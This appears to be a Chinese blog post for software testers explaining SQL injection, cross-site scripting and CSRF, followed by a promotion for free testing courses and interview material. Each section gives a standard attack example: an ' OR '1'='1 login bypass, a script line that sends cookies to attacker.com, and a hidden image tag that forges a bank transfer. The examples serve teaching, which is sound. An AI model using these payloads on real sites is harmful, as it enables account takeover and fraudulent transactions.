SQL注入,跨站脚本,跨站请求伪造，傻傻分不清楚

安全测试常见的SQL注入，跨站脚本攻击以及跨站请求伪造这三个经常有人分不清楚。今天就澄清一下概念，并举例说明这三个分别是什么。

SQL注入 (SQL Injection)

SQL注入是一种安全漏洞，攻击者通过在输入字段中插入或 "注入" SQL代码，来操作或操纵后端数据库。如果一个应用程序没有正确地处理这些输入，这可能会导致未授权的数据查看，数据操纵，甚至是完全的数据库控制。

例如：

如果一个登录表单的后端SQL查询是这样的：

SELECT * FROM users WHERE username = '[username]' AND password = '[password]'

攻击者可以在用户名或密码字段中输入以下内容：

' OR '1'='1

这样，如果应用程序没有正确地处理或转义这些输入，那么SQL查询将变成：

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''

因为 `'1'='1'` 总是为真，所以这将返回所有的用户，允许攻击者无需密码即可登录。

跨站脚本 (Cross-Site Scripting, XSS)

跨站脚本是一种安全漏洞，它允许攻击者注入恶意脚本到受害者的浏览器中。这些脚本可以访问和操纵页面上的任何信息，包括敏感信息如session cookies。

例如：

如果一个网站允许用户在评论中输入HTML，并且这些输入没有被适当地处理或转义，那么攻击者可以输入以下内容：

document.location='https://attacker.com/steal.php?cookie='+document.cookie;

这个脚本会将用户的cookies发送到攻击者控制的网站，攻击者可以用这些cookies来模拟用户的session，获取到他们的账户。

跨站请求伪造 (Cross-Site Request Forgery, CSRF)

跨站请求伪造是一种攻击，攻击者诱使受害者执行他们并不想要的操作。这通常涉及到利用用户已经登录的session，来在他们不知情的情况下执行操作。

例如：

如果一个网站有一个URL，如 `http://bank.com/transfer?to=account&amount=1000`，用于转账，攻击者可以在他们控制的网站上放置以下HTML：

< img /src="http://bank.com/transfer?to=attacker&amount=1000" width="0" height="0" />

如果受害者在他们的银行网站上有一个有效的session，然后访问了攻击者的网站，那么他们的浏览器将会尝试加载这个 "图片"，从而在他们不知情的情况下进行转账操作。

看完例子后，你清楚了吗？

最后：下方这份完整的软件测试视频教程已经整理上传完成，需要的朋友们可以自行领取【保100%免费】

软件测试面试文档

我们学习必然是为了找到高薪的工作，下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料，并且有字节大佬给出了权威的解答，刷完这一套面试资料相信大家都能找到满意的工作。